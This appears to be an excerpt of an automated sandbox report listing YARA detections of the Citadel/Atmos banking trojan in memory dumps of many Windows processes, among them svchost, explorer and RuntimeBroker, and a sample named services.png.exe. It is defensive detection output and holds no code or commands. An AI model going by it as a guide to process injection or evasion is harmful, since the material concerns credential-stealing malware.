Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.3.services.png.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 1.3.nyheukpo.exe.20f0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
